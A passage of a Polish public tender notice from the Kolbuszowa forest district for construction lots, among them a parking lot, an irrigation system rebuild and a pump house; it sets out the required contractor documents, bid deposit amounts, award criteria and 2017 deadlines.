4.Jeżeli w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania lub miejsce zamieszkania ma osoba, której dokument dotyczy, nie wydaje się dokumentów, o których mowa w pkt. 2, zastępuje się je dokumentem zawierającym odpowiednio oświadczenie wykonawcy, ze wskazaniem osoby lub osób uprawnionych do jego reprezentacji, lub oświadczenie osoby, której dokument miał dotyczyć, złożone przed notariuszem lub organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczo właściwym ze względu na siedzibę lub miejsce zamieszkania tej osoby. Zapis pkt 3 stosuje się. 
5.W celu oceny, czy wykonawca polegając na zdolnościach lub sytuacji innych podmiotów na zasadach określonych w art. 22a ustawy pzp, będzie dysponował niezbędnymi zasobami w stopniu umożliwiającym należyte wykonanie zamówienia publicznego oraz oceny, czy stosunek łączący wykonawcę z tymi podmiotami gwarantuje rzeczywisty dostęp do ich zasobów, zamawiający żąda dokumentów, które określają w szczególności:
a)zakres dostępnych wykonawcy zasobów innego podmiotu,     
b)sposób wykorzystania zasobów innego podmiotu przez wykonawcę przy wykonywaniu zamówienia publicznego, 
c)zakres i okres  udziału innego podmiotu przy wykonywaniu zamówienia publicznego, 
d)czy podmiot, na zdolnościach którego wykonawca polega w odniesieniu do warunków udziału w postępowaniu dotyczących wykształcenia, kwalifikacji zawodowych lub doświadczenia, zrealizuje roboty budowlane lub usługi, których wskazane zdolności dotyczą. 
6.Zamawiający żąda od wykonawcy, który polega na zdolnościach lub sytuacji innych podmiotów na zasadach określonych w art. 22a ustawy pzp, przedstawia w odniesieniu do tych podmiotów dokumentów wymienionych w pkt VIIA, VIIB. 
7.W przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia dokumenty wymagane w pkt VIIA, VIIB winny być złożone przez każdego z wykonawców</div><b>
                III.5) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 1 USTAWY PZP
              </b><br /><div style="padding-left: 20px"><b>III.5.1) W ZAKRESIE SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU:</b><br />1.W celu potwierdzenia spełnienia przez wykonawcę warunków udziału w postępowaniu dotyczących sytuacji finansowej lub ekonomicznej zamawiający żąda następujących dokumentów:
a)informacja banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającej wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, w zakresie niezbędnym do wykazania spełnienia warunku opisanego w ust. V pkt 1, ppkt. a) SIWZ i sekcji III.1.2) ogłoszeniao zamówieniu, w okresie nie wcześniejszym niż 1 miesiąc przed upływem terminu składania ofert,
b)dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia w zakresie niezbędnym do wykazania spełnienia warunku opisanego w ust. V pkt 1, ppkt. b) SIWZ.  Jeżeli z uzasadnionej przyczyny wykonawca nie może złożyć dokumentów dotyczących sytuacji finansowej lub ekonomicznej wymaganych przez zamawiającego, może złożyć inny dokument, który w wystarczający sposób potwierdza spełnienie opisanego przez zamawiającego warunku udziału w postępowaniu. 
W przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia warunek zostanie spełniony, jeżeli jeden z wykonawców wykaże, iż posiada środki finansowe lub zdolność kredytową oraz jest ubezpieczony od odpowiedzialności cywilnej w zakresie żądanym przez zamawiającego w opisie warunku udziału w postępowaniu. 

2.W celu potwierdzenia spełnienia przez wykonawcę warunków udziału w postępowaniu dotyczących zdolności technicznej oraz zawodowej zamawiający żąda następujących dokumentów: 
1)wykazu robót budowlanych wykonanych nie wcześniej niż w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy  w tym okresie, w zakresie niezbędnym do wykazania spełnienia warunku opisanego w ust. V pkt 2 ppkt. a) SIWZ i sekcji III.1.3) ogłoszenia o zamówieniu dla każdej części odrębnie przez co należy rozumieć dla każdej części odrębną robotę budowlaną. Ta sama robota budowlana dla kilku części nie zostanie uznana jako spełniająca wymagania, wraz z podaniem ich rodzaju, wartości, daty, miejsca wykonania i podmiotów, na rzecz których roboty te zostały wykonane, z załączeniem dowodów określających czy te roboty budowlane zostały wykonane należycie, w szczególności informacji o tym czy roboty zostały wykonane zgodnie z przepisami prawa budowlanego i prawidłowo ukończone, przy czym dowodami, o których mowa są referencje bądź inne dokumenty wystawione przez podmiot, na rzecz którego roboty budowlane były wykonywane, a jeżeli z uzasadnionej przyczyny o obiektywnym charakterze wykonawca nie jest w stanie uzyskać tych dokumentów  inne dokumenty, 
2)wykazu osób, skierowanych przez wykonawcę do realizacji zamówienia publicznego, w szczególności odpowiedzialnych za kierowanie robotami budowlanymi, drogowymi, branżowymi w zależności od części zamówienia, w zakresie niezbędnym do wykazania warunku opisanego w ust. V pkt 2 ppkt. b) SIWZ i sekcji III.1.3) ogłoszenia o zamówieniu, wraz z informacjami na temat ich uprawnień niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami.
Wykazując spełnianie warunku udziału w postępowaniu w wykazie robót budowlanych należy podać wartość wykonanych robót w celu weryfikacji spełniania warunku udziału w postępowaniu.
W przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia, warunek zostanie spełniony, jeżeli jeden z wykonawców wykaże, iż wykonał roboty budowlane w zakresie każdej części odrębnie w zakresie żądanym przez zamawiającego w opisie warunku udziału w postępowaniu.
Dodatkowe dokumenty, które należy dołączyć do oferty: 

1)	formularz ofertowy  zał. nr 1, 
2)	dowód wpłaty/złożenia wadium, 
3)	pełnomocnictwo (wykonawcy występujący wspólnie w rozumieniu art. 23 ustawy pzp) do reprezentowania Wykonawcy w postępowaniu, albo do reprezentowania w postępowaniu i zawarciu umowy, z którego wynika zakres, tj. do jakich czynności uprawniony jest pełnomocnik  dołączyć, o ile dotyczy,
4)	kosztorys ofertowy wypełniony w oparciu o przedmiar robót sporządzony metodą uproszczoną w zakresie części od 1 do 5, oraz formularz cenowy w zakresie części od 6 do 8.
5)	oświadczenie o braku podstaw do wykluczenia  zał. nr 2
6)	oświadczenie o spełnieniu warunków w postępowaniu  zał. nr 3
Zamawiający, poza możliwością zmiany zawartej umowy na podstawie art. 144 ust. 1 pkt 2, 3, 4, 5, 6 ustawy pzp, przewiduje również możliwość dokonywania zmian postanowień zawartej umowy, także w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy, w następujących okolicznościach: 
1.	zmiana terminów wykonania umowy: 
1)	zmiany wynikające z warunków atmosferycznych, które spowodowały niezawinione i niemożliwe do uniknięcia przez Wykonawcę opóźnienie,                          w szczególności: 
a)	klęsk żywiołowych, 
b)	warunków atmosferycznych odbiegających od typowych dla danej pory roku, uniemożliwiających prowadzenie robót budowlanych, 
2)	zmiany spowodowane nieprzewidzianymi w SIWZ warunkami terenowymi, które spowodowały niezawinione i niemożliwe do uniknięcia  przez Wykonawcę opóźnienie, w szczególności: 
a)	natrafienie w trakcie prowadzenia robót na niewypały i niewybuchy, 
b)	konieczność wykonania wykopalisk archeologicznych, 
c)	natrafienie na nie zainwentaryzowane lub błędnie zainwentaryzowane podziemne urządzenia, instalacje, 
3)	zmiany będące następstwem okoliczności leżących po stronie zamawiającego, które spowodowały niezawinione i niemożliwe do uniknięcia przez Wykonawcę opóźnienie, w szczególności: 
a)	konieczność usunięcia błędów lub wprowadzenia zmian w dokumentacji projektowej lub specyfikacji technicznej wykonania i odbioru robót, 
b)	konieczność wykonania robót zamiennych lub zamówień dodatkowych.
2.	Strony dopuszczają możliwość zmiany treści umowy w sytuacji: 
a)	zamiaru powierzenia części zadania podwykonawcy wówczas, gdy Wykonawca deklarował osobiste wykonanie zadania,  
b)	potrzeby zmiany zakresu robót przeznaczonych do wykonania przez Podwykonawcę.    
3.	Zmiany określone w ust. 2 mogą być wprowadzone wyłącznie za zgodą stron umowy na pisemny wniosek Wykonawcy z uzasadnieniem dokonania planowanej zmiany.
<br /><b>III.5.2) W ZAKRESIE KRYTERIÓW SELEKCJI:</b><br /></div><b>
                III.6) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 2 USTAWY PZP
              </b><br /><div style="padding-left: 20px"></div><b>
                III.7) INNE DOKUMENTY NIE WYMIENIONE W pkt III.3) - III.6)
              </b><div style="padding-left: 20px"></div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA IV: PROCEDURA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>IV.1) OPIS </b><br /><b>IV.1.1) Tryb udzielenia zamówienia: </b>
                przetarg nieograniczony
              <br /><b>IV.1.2) Zamawiający żąda wniesienia wadium:</b><div style="padding-left: 20px">
                  tak,
                  <br />
                  Informacja na temat wadium
                  <br />1.Zamawiający żąda od wykonawców wniesienia wadium wysokości:
- dla części nr 1 - 1 000,00 zł. (słownie: Jeden tysiąc złotych 0 groszy)
- dla części nr 2  20 000,00zł. (słownie: Dwadzieścia tysięcy złotych 0 groszy)
- dla części nr 3  2 000,00zł. (słownie: Dwa tysiące złotych 0 groszy)
- dla części nr 4  6 000,00zł (słownie: Sześć tysięcy złotych 0 groszy)
- dla części nr 5  2 500,00zł (słownie: Dwa tysiące pięćset złotych 0 groszy)
- dla części nr 6  3 000,00zł (słownie: Trzy tysiące złotych 0 groszy)
- dla części nr 7  1 000,00zł (słownie: Jeden tysiąc złotych 0 groszy)
- dla części nr 8  1 800,00zł (słownie: Jeden tysiąc osiemset złotych 0 groszy) 
2.Wadium wnosi się przed terminem składania ofert.   
3.Wadium może być wnoszone w jednej lub kilku następujących formach: 
1)Pieniądzu,
2)Poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym, 
3)	Gwarancjach bankowych, 
4)	Gwarancjach ubezpieczeniowych,
5)	Poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt. 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. z 2016 r., poz. 359). 
4.Wadium w formie poręczeń lub gwarancji musi wskazywać jako beneficjenta PGL LP Nadleśnictwo Kolbuszowa. 
5.Wadium wnoszone w pieniądzu wpłaca się przelewem na rachunek bankowy

Bank PKO BP o.RZESZÓW  07102044050000220204070553

z oznaczeniem Wadium  wadium na część/ci Nr .. /  wg. wybranych do ofertowania części.

6.Wadium w formie poręczeń lub gwarancji należy złożyć wraz z ofertą (w oryginale). Dokument wadium powinien być dołączony do oferty w oddzielnej kopercie lub w sposób, który pozwoli na jego późniejszy zwrot dla wykonawcy baz naruszania integralności całej oferty. Dokument wadium powinien być oznaczony: Wadium na część Nr . Pn.  ... 
7.Wadium w formie poręczeń lub gwarancji musi gwarantować zamawiającemu bezwarunkową wypłatę na jego pierwsze pisemne żądanie kwoty wadium w przypadkach określonych w art. 46 ust. 4a oraz ust. 5 ustawy pzp, bez jakichkolwiek dodatkowych zastrzeżeń i warunków. Poręczenia i gwarancje muszą być ważne co najmniej przez okres związania ofertą, a w przypadku przedłużenia terminu związania ofertą  także przez ten okres.
</div><br /><b>IV.1.3) Przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b><div style="padding-left: 20px">
                  nie
                </div><br /><b>
                IV.1.4) Wymaga się złożenia ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /></div><br /><b>
                IV.1.5.) Wymaga się złożenia oferty wariantowej:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie oferty wariantowej
                <br />
                  nie
                <br />
                Złożenie oferty wariantowej dopuszcza się tylko z jednoczesnym złożeniem oferty zasadniczej:
                <br />
                  nie
                </div><br /><b>
                IV.1.6) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu
              </b><br /><i>
                (przetarg ograniczony, negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne)
              </i><div style="padding-left: 20px">
                Liczba wykonawców  <br />
                Przewidywana minimalna liczba wykonawców  <br />
                Maksymalna liczba wykonawców  <br />
                Kryteria selekcji wykonawców:
                <br /></div><br /><b>
                IV.1.7) Informacje na temat umowy ramowej lub dynamicznego systemu zakupów:
              </b><div style="padding-left: 20px">
                Umowa ramowa będzie zawarta:
                <br /><br />
                Czy przewiduje się ograniczenie liczby uczestników umowy ramowej:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                Zamówienie obejmuje ustanowienie dynamicznego systemu zakupów:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                W ramach umowy ramowej/dynamicznego systemu zakupów dopuszcza się złożenie ofert w formie katalogów elektronicznych:
                <br />
                  nie
                <br />
                Przewiduje się pobranie ze złożonych katalogów elektronicznych informacji potrzebnych do sporządzenia ofert w ramach umowy ramowej/dynamicznego systemu zakupów:
                <br />
                  nie
                </div><br /><b>IV.1.8) Aukcja elektroniczna </b><br /><b>
                Przewidziane jest przeprowadzenie aukcji elektronicznej </b><i>(przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem) </i>
                nie
              <br /><b>Należy wskazać elementy, których wartości będą przedmiotem aukcji elektronicznej: </b><br /><b>Przewiduje się ograniczenia co do przedstawionych wartości, wynikające z opisu przedmiotu zamówienia:</b><br />
                nie
              <br />

              
                Należy podać, które informacje zostaną udostępnione wykonawcom w trakcie aukcji elektronicznej oraz jaki będzie  termin ich udostępnienia:
              
              <br />
              Informacje dotyczące przebiegu aukcji elektronicznej: 
              <br />
              Jaki jest przewidziany sposób postępowania w toku aukcji elektronicznej i jakie będą warunki, na jakich wykonawcy będą mogli licytować (minimalne wysokości postąpień): 
              <br />
              Informacje dotyczące wykorzystywanego sprzętu elektronicznego, rozwiązań i specyfikacji technicznych w zakresie połączeń:
              <br />
              Wymagania dotyczące rejestracji i identyfikacji wykonawców w aukcji elektronicznej: 
              <br />


              Informacje o liczbie etapów aukcji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Aukcja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Czy wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu:
                
                  nie
                <br />
                Warunki zamknięcia aukcji elektronicznej:
                <br /></div><br /><b>IV.2) KRYTERIA OCENY OFERT </b><br /><b>IV.2.1) Kryteria oceny ofert: </b><br /><b>IV.2.2) Kryteria</b><br /><div style="padding-left: 20px"><table><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>cena</td><td>60.00</td></tr><tr><td>przedłużenie minimalnego okresu gwarancji jakości dla przedmiotu zamówienia</td><td>40.00</td></tr><tr><td></td><td></td></tr></table></div><br /><b>IV.2.3) Zastosowanie procedury, o której mowa w art. 24aa ust. 1 ustawy Pzp </b>(przetarg nieograniczony)
              <br />
                nie
              <br /><b>IV.3) Negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne </b><br /><b>IV.3.1) Informacje na temat negocjacji z ogłoszeniem</b><br />
              Minimalne wymagania, które muszą spełniać wszystkie oferty:
              <br /><br />
              Przewidziane jest zastrzeżenie prawa do udzielenia zamówienia na podstawie ofert wstępnych bez przeprowadzenia negocjacji
              
                nie
              <br />
              Przewidziany jest podział negocjacji na etapy w celu ograniczenia liczby ofert:
              
                nie
              <br />
              Należy podać informacje na temat etapów negocjacji (w tym liczbę etapów):
              <br /><br />
              Informacje dodatkowe
              <br /><br /><br /><b>IV.3.2) Informacje na temat dialogu konkurencyjnego</b><br />
              Opis potrzeb i wymagań zamawiającego lub informacja o sposobie uzyskania tego opisu:
              <br /><br />
              Informacja o wysokości nagród dla wykonawców, którzy podczas dialogu konkurencyjnego przedstawili rozwiązania stanowiące podstawę do składania ofert, jeżeli zamawiający przewiduje nagrody:
              <br /><br />
              Wstępny harmonogram postępowania:
              <br /><br />
              Podział dialogu na etapy w celu ograniczenia liczby rozwiązań:
              
                nie
              <br />
              Należy podać informacje na temat etapów dialogu:
              <br /><br /><br />
              Informacje dodatkowe:
              <br /><br /><b>IV.3.3) Informacje na temat partnerstwa innowacyjnego</b><br />
              Elementy opisu przedmiotu zamówienia definiujące minimalne wymagania, którym muszą odpowiadać wszystkie oferty:
              <br /><br />
              Podział negocjacji na etapy w celu ograniczeniu liczby ofert podlegających negocjacjom poprzez zastosowanie kryteriów oceny ofert wskazanych w specyfikacji istotnych warunków zamówienia:
              <br />
                nie
              <br />
              Informacje dodatkowe:
              <br /><br /><b>IV.4) Licytacja elektroniczna  </b><br />
              Adres strony internetowej, na której będzie prowadzona licytacja elektroniczna:
              <br /><div style="padding-left: 20px"></div>

              Adres strony internetowej, na której jest dostępny opis przedmiotu zamówienia w licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Wymagania dotyczące rejestracji i identyfikacji wykonawców w licytacji elektronicznej, w tym wymagania techniczne urządzeń informatycznych:
              <br /><div style="padding-left: 20px"></div>

              Sposób postępowania w toku licytacji elektronicznej, w tym określenie minimalnych wysokości postąpień:
              <br /><div style="padding-left: 20px"></div>

              Informacje o liczbie etapów licytacji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Licytacja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Wykonawcy, którzy nie złożyli nowych postąpień, zostaną  zakwalifikowani do następnego etapu:
                
                  nie
                </div>

              Termin otwarcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Termin i warunki zamknięcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div><br />
              Istotne dla stron postanowienia, które zostaną wprowadzone do treści zawieranej umowy w sprawie zamówienia publicznego, albo ogólne warunki umowy, albo wzór umowy:
              <br /><div style="padding-left: 20px"></div><br />
              Wymagania dotyczące zabezpieczenia należytego wykonania umowy: 
              <br /><div style="padding-left: 20px"></div><br />
              Informacje dodatkowe:
              <br /><div style="padding-left: 20px"></div><b>IV.5) ZMIANA UMOWY</b><br /><b>Przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy:</b>
                tak

                <br />
                Należy wskazać zakres, charakter zmian oraz warunki wprowadzenia zmian:
                <br />Zamawiający, poza możliwością zmiany zawartej umowy na podstawie art. 144 ust. 1 pkt 2, 3, 4, 5, 6 ustawy pzp, przewiduje również możliwość dokonywania zmian postanowień zawartej umowy, także w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy, w następujących okolicznościach: 
1.	zmiana terminów wykonania umowy: 
1)	zmiany wynikające z warunków atmosferycznych, które spowodowały niezawinione i niemożliwe do uniknięcia przez Wykonawcę opóźnienie,                          w szczególności: 
a)	klęsk żywiołowych, 
b)	warunków atmosferycznych odbiegających od typowych dla danej pory roku, uniemożliwiających prowadzenie robót budowlanych, 
2)	zmiany spowodowane nieprzewidzianymi w SIWZ warunkami terenowymi, które spowodowały niezawinione i niemożliwe do uniknięcia  przez Wykonawcę opóźnienie, w szczególności: 
a)	natrafienie w trakcie prowadzenia robót na niewypały i niewybuchy, 
b)	konieczność wykonania wykopalisk archeologicznych, 
c)	natrafienie na niezainwentaryzowane lub błędnie zainwentaryzowane podziemne urządzenia, instalacje, 
3)	zmiany będące następstwem okoliczności leżących po stronie zamawiającego, które spowodowały niezawinione i niemożliwe do uniknięcia przez Wykonawcę opóźnienie, w szczególności: 
a)	konieczność usunięcia błędów lub wprowadzenia zmian w dokumentacji projektowej lub specyfikacji technicznej wykonania i odbioru robót, 
b)	konieczność wykonania robót zamiennych lub zamówień dodatkowych.
2.	Strony dopuszczają możliwość zmiany treści umowy w sytuacji: 
a)	zamiaru powierzenia części zadania podwykonawcy wówczas, gdy Wykonawca deklarował osobiste wykonanie zadania,  
b)	potrzeby zmiany zakresu robót przeznaczonych do wykonania przez Podwykonawcę.    
3.	Zmiany określone w ust. 2 mogą być wprowadzone wyłącznie za zgodą stron umowy na pisemny wniosek Wykonawcy z uzasadnieniem dokonania planowanej zmiany.
<br /><b>IV.6) INFORMACJE ADMINISTRACYJNE </b><br /><br /><b>IV.6.1) Sposób udostępniania informacji o charakterze poufnym </b><i>(jeżeli dotyczy): </i><br />NIE DOTYCZY<br /><b>Środki służące ochronie informacji o charakterze poufnym</b><br /><br /><b>IV.6.2) Termin składania ofert lub wniosków o dopuszczenie do udziału w postępowaniu: </b><br />
              Data: 09/01/2017, godzina: 09:00,
              <br />
              Skrócenie terminu składania wniosków, ze względu na pilną potrzebę udzielenia zamówienia (przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem):
              <br />
                nie
              <br />
              Wskazać powody:
              <br /><br />
              Język lub języki, w jakich mogą być sporządzane oferty lub wnioski o dopuszczenie do udziału w postępowaniu
              <br />&gt;
              Ofertę należy sporządzić w języku polskim <br /><b>IV.6.3) Termin związania ofertą: </b>
                do: 10/02/2017
                okres w dniach: 30 (od ostatecznego terminu składania ofert)
              <br /><b>IV.6.4) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia:</b>
                nie
              <br /><b>IV.6.5) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, jeżeli środki służące sfinansowaniu zamówień na badania naukowe lub prace rozwojowe, które zamawiający zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia, nie zostały mu przyznane</b>
                nie
              <br /><b>IV.6.6) Informacje dodatkowe:</b><br /></div></div><div class="headerLarge_xforms" style="text-align: center"><u>
                ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH
              </u></div><div><b>Część nr: </b>1
                  
                <b>Nazwa: </b>Budowa parkingu przy Leśnictwie Poręby Dymarskie<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Budowa parkingu przy Leśnictwie Poręby Dymarskie w tym.:
1.1. Roboty ziemne przygotowawcze.
1.2. Zabezpieczenia istniejących instalacji gazowych 2 linie ziemne.
1.3. Podbudowa parkingu wraz z zjazdami do drogi publicznej.
1.4. Krawężniki i nawierzchnia parkingu.
1.5. Roboty Uzupełniające.<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>45000000-7<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      data zakończenia: 31/07/2017<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>cena</td><td>60.00</td></tr><tr><td>przedłużenie minimalnego okresu gwarancji jakości dla przedmiotu zamówienia</td><td>40.00</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div><div><b>Część nr: </b>2
                  
                <b>Nazwa: </b>Przebudowa deszczowni  Etap I, w Leśnictwie Nasienno-Szkółkarskim<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Przebudowa deszczowni  Etap I, w Leśnictwie Nasienno-Szkółkarskim
2.1. Kanalizacja deszczowa.
2.2. Rurociągi główne wraz ze studzienkami.
2.3. Instalacja zraszająca w korytach DUNEMANA z dyszami zraszającymi.
2.4. Przygotowanie terenu pod montaż rampy deszczującej i budowę budynku .pompowni.
2.5. Demontaż  istniejących koryt DUNEMANA.
2.6. Wykonanie nowych koryt DUNEMANA.
2.7. Rampa deszczująca .
2.8. Kamery  Monitoring.
2.9. Układ sterowania w tunelu foliowym.
2.10. Wymiana zamgławiaczy w tunelu foliowym.
2.11. Remont studni.
2.12. Ujęcie wody ze studnią czerpalną z koszem ssawnym i zaworem zwrotnym.
2.13. Układ napowietrzania zbiornika.
2.14. Zasilania zewnętrzne przekładki kabli.
2.15. Połączenia Budynek urządzenia zewnętrzne.
2.16. Sprawdzenia i pomiary.
Z uwagi na nieprzerwaną produkcję szkółkarską w czasie trwania prac przebudowy deszczowni Etap  I, zamawiający informuje, że należy zwrócić szczególną uwagę i ostrożność  na istniejącą instalację która przez cały czas prowadzenia robót misi funkcjonować.
<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>45000000-7<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      data zakończenia: 31/08/2017<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>cena</td><td>60.00</td></tr><tr><td>przedłużenie minimalnego okresu gwarancji jakości dla przedmiotu zamówienia</td><td>40.00</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div><div><b>Część nr: </b>3
                  
                <b>Nazwa: </b>Przebudowa placu sprzedaży sadzonek szkółki.<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Przebudowa placu sprzedaży sadzonek szkółki.
3.1. Profilowanie i utwardzenie skarp zbiornika otwartego płytami drogowymi z odzysku.
3.2. Kanalizacja deszczowa.
3.3. Demontaż zbiornika na chemikalia.
3.4. Budowa zbiornika bezodpływowego.<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>45000000-7<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      data zakończenia: 31/08/2017<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>cena</td><td>60.00</td></tr><tr><td>przedłużenie minimalnego okresu gwarancji jakości dla przedmiotu zamówienia</td><td>40.00</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div><div><b>Część nr: </b>4
                  
                <b>Nazwa: </b>Budowa budynku pompowni z instalacjami wewnętrznymi i niezbędnymi przekładkami kabli.<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Budowa budynku pompowni z instalacjami wewnętrznymi i niezbędnymi przekładkami kabli.
4.1. Roboty ziemne .
4.2. Fundamenty.
4.3. Ściany i ścianki.
4.4. Stropodach.
4.5. Izolacje.
4.6. Podłoże posadzki.
4.7. Okna i drzwi .
4.8. Tynki i okładziny .
4.9. Malowanie .
4.10. Roboty blacharskie.
4.11. Elementy zewnętrzne  chodniki.
4.12. Pompownia wody.
4.13. Zasilanie zewnętrzne i przekładki kabli.
4.14. Instalacje elektryczne w budynku pompowni.
4.15. Tablice rozdzielcze.
4.16. Instalacja odgromowa i uziemiająca pompowni.
4.17. Sprawdzenia i pomiary.
4.18. Demontaż.<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>45000000-7<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      data zakończenia: 31/08/2017<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>cena</td><td>60.00</td></tr><tr><td>przedłużenie minimalnego okresu gwarancji jakości dla przedmiotu zamówienia</td><td>40.00</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div><div><b>Część nr: </b>5
                  
                <b>Nazwa: </b>Budowa składu na drewno w Leśnictwie Poręby Dymarskie<br /><div style="padding-left: 20px"><b>
